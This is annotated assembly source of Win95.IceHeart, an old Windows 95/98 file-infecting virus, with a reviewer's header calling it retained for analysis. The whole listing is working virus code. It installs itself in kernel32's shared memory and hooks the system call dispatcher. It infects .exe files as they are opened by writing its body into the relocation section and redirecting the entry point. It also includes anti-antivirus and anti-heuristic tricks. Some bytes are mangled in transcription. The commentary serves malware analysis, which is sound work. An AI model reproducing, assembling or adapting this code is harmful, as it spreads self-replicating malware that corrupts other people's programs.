;last review 29.06.1999
; (the original line here was a quotation whose non-ASCII bytes -- apparently
;  Cyrillic -- did not survive transcription; it carried no code)
;Win95.IceHeart v1.5
;(c) 1998-xxxx Stainless Steel Rat /2Rats /RVA /IkX
;
;=======================================================================
; Historical Win9x PE file-infector source, retained for analysis only.
; NOTE(review): this is TASM/MASM dialect (`jumps`, `.model`, `ptr`,
; `offset`, the multi-operand `push ecx eax`) even though the mirror
; labels the listing "NASM".
;
; What the visible code does (details at each label):
;   1. Runs as the host's entry point; does nothing unless the return
;      address on the stack lies in 0BFxxxxxxh (where the hard-coded
;      kernel32 base _krnl_begin also lives) -- effectively a Win9x gate.
;   2. Walks the section table of the kernel32 image at _krnl_begin for a
;      shared+writable section with enough slack after its VirtualSize and
;      copies itself there (_start .. _SectionForUs).
;   3. Inside that copy, saves and overwrites the 6-byte far pointer found
;      via _krnl_begin+_1st_export+0Ah so that calls through it land in
;      _Handler (_SecondStart).
;   4. _Handler watches for service 2A0010h with AX=716Ch and, for names
;      ending in ".exe", writes the body into the file's base-relocation
;      section and points the entry point at it (_Infect_It).
; Indicators that follow directly from this listing:
;   - MajorLinkerVersion (PE+1Ah) is set to 51h in infected files.
;   - AddressOfEntryPoint is replaced by DataDirectory[5].VirtualAddress.
;   - The embedded string alternates "Win95.iCE-hEART"/"Win98.iCE-hEART".
; The hard-coded base and offsets (_krnl_begin, _1st_export, 178h) tie the
; code to one specific Win95 kernel32 build; the checks in _start route to
; the host's original entry point when they do not match.
;=======================================================================
jumps                    ; TASM: auto-extend conditional jumps that do not reach
.386
.model flat,stdcall
extrn ExitProcess:PROC   ; only used as the first-generation value of _old_eip
.code
;-----------------------------------------------------------------------
; _start -- entry point of the dropper and of every infected host.
; In:   [esp] = return address into the host's caller (used as an OS check)
; Out:  never returns; ends with a jmp to the address stored in _old_eip.
; Regs: ESI = load delta (actual address - assembled address), kept across
;       the pusha/popa so the final jmp can locate _old_eip; EBP saved/restored.
;-----------------------------------------------------------------------
start:
_start:
cld
call _Next               ; delta trick: push the run-time address of _Next ...
_Next:
pop esi
sub esi,offset _Next     ; ... minus its assembled address -> ESI = load delta
push ebp
cmp byte ptr [esp+3+4],0BFh ; top byte of the entry return address: 0BFh <=> Win9x kernel32 region
jne _ExitNow             ; anything else (author's note: NT) -> straight to the host
; Walk the kernel32 section table (assumed at image+178h in this build).
; EBP points at the VirtualAddress field (+0Ch) of the current 40-byte
; IMAGE_SECTION_HEADER; wanted: Characteristics == 0D0000040h
; (CNT_INITIALIZED_DATA | MEM_SHARED | MEM_READ | MEM_WRITE) and enough
; unused room between VirtualSize and the next section's RVA.
mov ebp,_krnl_begin+178h+0Ch-40 ; 40 bytes before the first header's VirtualAddress field
_DoSearchSection:
add ebp,40               ; next section header
mov edx,[ebp]            ; EDX = this section's VirtualAddress
test edx,edx
jz _ExitNow              ; zero RVA: end of table, nothing suitable -> run host
cmp dword ptr [ebp+24h-0Ch],0D0000040h ; Characteristics (header+24h)
jne _DoSearchSection
mov eax,[ebp+0Ch+40-0Ch] ; EAX = next section's VirtualAddress
mov ebx,eax
sub eax,edx              ; EAX = gap between the two RVAs ...
sub eax,[ebp+8-0Ch]      ; ... minus this section's VirtualSize = unused slack
cmp ah,(virlen_in_mem/256)+1 ; slack in 256-byte units (bits 8..15 only) >= what the resident image needs?
jb _DoSearchSection
; here: EBX = next section's RVA, EDX = this section's RVA, EAX = slack
; (the author's original comments read "in ebx second rva / in edx virtual
;  size"; EDX is in fact still the first RVA)
_SectionForUs:
sub ebx,eax              ; EBX = next RVA - slack = end of this section's used part
lea edi,[_krnl_begin+ebx] ; EDI = destination inside the kernel32 image; the hook
                         ; below relies on this memory being shared by all processes
lea ebp,[edi+offset _SecondStart-offset _start] ; EBP = where _SecondStart will sit in the copy
pusha
lea esi,[esi+offset _start] ; ESI = run-time address of our own body
_ResidencyCheck:
xor ecx,ecx
cmp byte ptr [edi],cl    ; first byte of the target must still be zero ...
jne _ExitNow2            ; ... else treat the spot as taken (e.g. already resident) and skip
mov ch,(virlen_in_mem/256)+1 ; ECX = resident size rounded up to 256-byte units
rep movsb                ; copy body + runtime variables into kernel32
call ebp                 ; run _SecondStart inside the copy (installs the hook)
_ExitNow2:
popa
_ExitNow:
pop ebp
jmp dword ptr [offset _old_eip+esi] ; continue at the host's saved entry point (delta-relative)
;-----------------------------------------------------------------------
; _SecondStart -- runs inside the kernel32-resident copy (entered via `call ebp`).
; Saves the 6-byte far pointer located at the address read from
; _krnl_begin+_1st_export+0Ah into _old_vxd_call, replaces it with CS:_Handler,
; and patches the two instructions in _Handler that need the copy's delta.
; What that pointer is in the targeted kernel32 cannot be verified from this
; listing; the author's naming ("1st export", "vxd call") suggests the
; kernel32 VxDCall dispatch pointer.
; In:  EBP = address of _SecondStart in the copy
; Out: EBP = relocation delta of the copy (address of X == offset X + EBP)
;-----------------------------------------------------------------------
_SecondStart:
mov esi,dword ptr ds:[_krnl_begin+_1st_export+0Ah] ; ESI -> the far pointer to hook
sub ebp,offset _SecondStart ; EBP = relocation delta of this copy
lea edi,[offset _old_vxd_call+ebp]
push esi
movsd                    ; save the original far pointer: 32-bit offset ...
movsw                    ; ... + 16-bit selector -> _old_vxd_call
lea eax,[ebp+offset _Handler]
pop edi                  ; EDI -> the live far pointer again
stosd                    ; offset   := _Handler
mov ax,cs
stosw                    ; selector := our CS (low word only; high word already stored)
_InitSomeVars:
mov dword ptr [offset _RelocFix+ebp+1],ebp ; patch the imm32 of `mov ebp,...` at _RelocFix (self-modifying)
lea eax,[offset _old_vxd_call+ebp]
mov dword ptr [ebp+offset _JmpFword+2],eax ; patch the disp32 of the `jmp fword ptr` at _JmpFword
retn
;-----------------------------------------------------------------------
; _Handler -- installed in place of the saved far pointer; every call through
; that pointer arrives here first. General registers are preserved by
; pusha/popa (flags are not) and the call is chained to the original pointer
; unless _Infect_It takes over.
; EAX = service id as seen by the hook; 2A0010h and 2A0040h are the two it
; reacts to (author: int 21h dispatch / DeviceIoControl). The stack offsets
; used below (44, 0C0h, 0C2h) assume the frame layout of the hooked thunk and
; cannot be verified from this listing.
; _busy_flag guards against re-entry: the infector's own _Int21h calls also
; pass through here.
;-----------------------------------------------------------------------
_Handler:
pusha
_RelocFix:
mov ebp,11223344h        ; placeholder; _InitSomeVars patches in the real delta
_CheckBusyFlag:
lea ecx,[offset _busy_flag+ebp]
xor edx,edx
cmp byte ptr [ecx],dl    ; already inside the infector? then just pass the call on
jne _Exit_Handler
mov dl,0C0h              ; EDX = 0C0h, a stack displacement used below
cmp eax,2A0040h          ; author: id of DeviceIoControl
jne _CheckInt21Call
_CheckAvpCalls:
cmp word ptr [edx+esp+2],22h ; word at [esp+0C2h] == 22h ?
jne _Exit_Handler
not dword ptr [edx+esp]  ; flips the dword at [esp+0C0h]; author's remark: "i think, avp likes
                         ; api code,like this ;)" -- an anti-AVP trick. Falls into the next
                         ; check, which fails for 2A0040h and exits.
_CheckInt21Call:
cmp eax,2A0010h          ; int 21h dispatch service?
jne _Exit_Handler
cmp word ptr [esp+44],716Ch ; dispatched AX == 716Ch (author: "openfile ?")
je _Infect_It
_Exit_Handler:
popa
_JmpFword:
jmp fword ptr ds:[offset _old_vxd_call] ; chain to the saved far pointer (disp32 patched by _InitSomeVars)
;-----------------------------------------------------------------------
; _Infect_It -- reached from _Handler with ECX -> _busy_flag, EBP = delta and
; ESI = the caller's ESI, which this code treats as a NUL-terminated filename
; (for AX=716Ch that is the DOS LFN open's name pointer).
; Flow: set busy flag -> ".exe" check -> open -> read 1024-byte header ->
; sanity/marker checks -> patch header in the buffer -> write body at the
; relocation section's raw offset -> write header back -> close -> clear
; busy flag -> _Exit_Handler. Failures unwind via _CloseJmp/_FreeStack/
; _ExitInfector.
; Stack while the file is open: [busy-flag ptr][1024-byte buffer][dword 1024].
;-----------------------------------------------------------------------
_Infect_It:
not byte ptr [ecx]       ; _busy_flag := 0FFh (block re-entry from our own int 21h calls)
mov edi,esi              ; EDI -> filename
xor eax,eax
cld
push ecx                 ; keep the _busy_flag pointer for _ExitInfector
push eax                 ; a zero dword, popped into ECX after the scan
mov ecx,esp              ; ECX = current ESP, used merely as a "large enough" scan count
repnz scasb              ; EDI -> one past the terminating NUL
pop ecx                  ; ECX = 0
mov eax,dword ptr [edi-5] ; last four characters before the NUL
or eax,20202000h         ; lowercase the three letters, leave the '.' byte alone
cmp eax,'exe.'           ; ".exe" as a little-endian dword
; cmp eax,'eci.'         ; (alternative ".ice" target, left disabled by the author)
jne _ExitInfector
_InfectFile:
xor byte ptr [offset _Name+4+ebp],13 ; toggle '5'<->'8' in "Win95." (35h xor 0Dh = 38h) in the resident copy
_AllocStack:
mov ch,4                 ; ECX = 400h = 1024
sub esp,ecx              ; 1024-byte scratch buffer on the stack
push ecx                 ; and its size, so _FreeStack can release it
_OpenFile:
xor edi,edi              ; DI = 0
xor eax,eax
cdq                      ; EDX = 0
inc edx                  ; DX = 1  (LFN open: action = open existing)
mov ebx,edx
inc ebx                  ; BX = 2  (LFN open: access = read/write); CX still holds 400h
mov ax,716Ch             ; LFN open/create, name in ESI
call _Int21h
xchg eax,ebx             ; EBX = handle (xchg leaves CF untouched)
jc _FreeStack            ; open failed -> unwind without closing
mov ah,3Fh               ; read ...
call _Process_1024b      ; ... 1024 bytes into the buffer; EDI -> buffer, EAX = bytes read
cmp ecx,eax
jne _CloseJmp            ; short read (file < 1024 bytes) -> give up
mov eax,[edi+3Ch]        ; e_lfanew
shr ecx,1                ; 512
cmp eax,ecx
jae _CloseJmp            ; PE header must start in the first half of the buffer
                         ; (the section-table walk below is not separately bounded)
add edi,eax              ; EDI -> "PE" header
mov eax,[edi]
inc eax                  ; +1 so the literal 'PE' never appears in the code (author: "heuristics sucks")
cmp ax,'EP'+1            ; signature check on the low word only; the two zero bytes are not checked
jne _CloseJmp
cmp byte ptr [edi+61h],7Dh ; byte 1 of SizeOfStackReserve (PE+60h); author: "winzip's sfx stack size"
je _CloseJmp             ; skip those files
_CheckAlreadyInfected:
; AL = low byte of 'PE'+1 = 51h at this point (EAX untouched since the inc)
cmp byte ptr [edi+1Ah],al ; MajorLinkerVersion (PE+1Ah) == 51h -> already infected
je _CloseJmp
mov byte ptr [edi+1Ah],al ; plant the marker: MajorLinkerVersion := 51h
test byte ptr [edi+23],22h ; high byte of Characteristics (PE+16h): 2000h = IMAGE_FILE_DLL,
                         ; 0200h is the "fixed image" bit in the author's words
jne _CloseJmp
mov byte ptr [edi+23],0  ; clears the whole high byte of Characteristics (author: "strip reloc";
                         ; IMAGE_FILE_RELOCS_STRIPPED is actually bit 0 of the low byte)
mov edx,dword ptr [edi+160] ; DataDirectory[5] (base relocations).VirtualAddress, PE+0A0h
test edx,edx
je _CloseJmp             ; no relocation directory -> nowhere to put the body
push edx
xchg dword ptr [edi+40],edx ; AddressOfEntryPoint (PE+28h) := reloc RVA; EDX = old entry RVA
add edx,dword ptr [edi+48+4] ; + ImageBase (PE+34h) -> absolute VA of the old entry point
mov dword ptr [offset _old_eip+ebp],edx ; stored in the resident copy, which is what gets written below
pop edx                  ; EDX = reloc RVA again
_AnalyzePlaceInFixupArea:
mov ecx,[edi+6]          ; NumberOfSections -- read as a dword, so the high word also
                         ; picks up the low half of TimeDateStamp (loop count oversized)
lea esi,[edi+0F8h+12]    ; first section header's VirtualAddress, assuming
                         ; SizeOfOptionalHeader = 0E0h (not checked)
_DoAnalyzeSections:
lodsd
cmp eax,edx              ; section whose VirtualAddress == relocation RVA?
je _OkiFixupOur
add esi,40-4             ; next header
loop _DoAnalyzeSections
_CloseJmp:
jmp _Close
_OkiFixupOur:
lodsd                    ; SizeOfRawData (header+10h)
mov edx,virlen
cmp eax,edx
jb _CloseJmp             ; raw data must hold the whole body
mov dword ptr [esi-12],edx ; VirtualSize (header+8) := virlen; section Characteristics are left as they are
push edx                 ; byte count for the write below
lodsd                    ; PointerToRawData (header+14h)
_Int21CallOptimization:
lea esi,[ebp+offset _Int21h] ; ESI -> _Int21h so the next three calls are `call esi`
_SeekToEnd:
push eax
pop dx                   ; DX = low word of PointerToRawData ...
pop cx                   ; ... CX = high word  (CX:DX = file offset)
mov ax,4200h             ; lseek from start
call esi
_WriteSelf:
mov ah,40h               ; write ...
lea edx,[ebp+offset _start] ; ... the resident body (with the patched _old_eip and _Name) ...
pop ecx                  ; ... virlen bytes
call esi
_WriteHeader:
xor eax,eax
mov ah,42h               ; AL = 0: lseek from start
cdq                      ; DX = 0. NOTE(review): ECX is not cleared here and still holds
                         ; the count of the previous write, so CX != 0; whether the
                         ; dispatcher ignores CX for this call cannot be told from this listing
call esi
mov ah,40h               ; write the modified 1024-byte header back
call _Process_1024b
_Close:
mov ah,3Eh               ; close handle in BX
call _Int21h
_FreeStack:
pop ecx                  ; 1024
add esp,ecx              ; release the scratch buffer
_ExitInfector:
pop ecx                  ; pointer to _busy_flag
not byte ptr [ecx]       ; 0FFh -> 0: re-enable the handler
jmp _Exit_Handler
;-----------------------------------------------------------------------
; _Process_1024b -- issue the int 21h function in AH against the 1024-byte
; stack buffer: EDI = EDX -> buffer (8 bytes above the return address, past
; the pushed size dword), ECX = 1024, then falls into _Int21h.
; _Int21h -- call kernel32's first export (address _krnl_begin+_1st_export)
; with (2A0010h, EAX, ECX) pushed; EBP and ECX are preserved around the call
; and the callee is assumed to remove its three arguments. Because that
; export is hooked, the call re-enters _Handler, which passes it through
; since _busy_flag is set.
; Out: EAX/flags as returned by the dispatched call.
;-----------------------------------------------------------------------
_Process_1024b:
lea edi,[esp+4+4]        ; skip return address + pushed 1024 -> the buffer
xor ecx,ecx
mov ch,4                 ; ECX = 1024
mov edx,edi
_Int21h:
push ecx
push ebp
push ecx eax             ; TASM multi-push: ECX, then EAX
push 2A0010h             ; the service id _Handler looks for
mov ebp,_krnl_begin+_1st_export
call ebp
pop ebp
pop ecx
retn
;-----------------------------------------------------------------------
; Data. Everything up to `virlen` is written into infected files; the two
; variables after it exist only in the resident copy.
;-----------------------------------------------------------------------
_Name db 'Win95.iCE-hEART',0 ; byte 4 ('5') is toggled to '8' and back on each infection; not otherwise used here
_Msg db '? ? ?? , ? ???? ??<3F>?<3F><><EFBFBD> <20>??<3F>? !',0 ; message text; non-ASCII bytes mangled in this copy; not referenced by the code in this listing
_old_eip dd offset ExitProcess ; VA to jump to after running; first generation: ExitProcess (the dropper just exits)
virlen equ $-offset start ; bytes written into infected files
_old_vxd_call db 6 dup ('') ; saved far pointer (dword offset + word selector); the empty ''
                         ; looks like a transcription artifact (unverified)
_busy_flag db ''         ; 0 = idle, 0FFh = infector running (see _Infect_It/_ExitInfector)
virlen_in_mem equ $-offset start ; size the resident copy needs (body + runtime variables)
ends
.data
db 13,10                 ; sole content of the data section
_krnl_begin equ 0BFF70000h ; hard-coded kernel32 base of the targeted Win95 build
_1st_export equ 13D4h    ; offset of kernel32's first export in that build (author's naming); +0Ah is read by _SecondStart
end start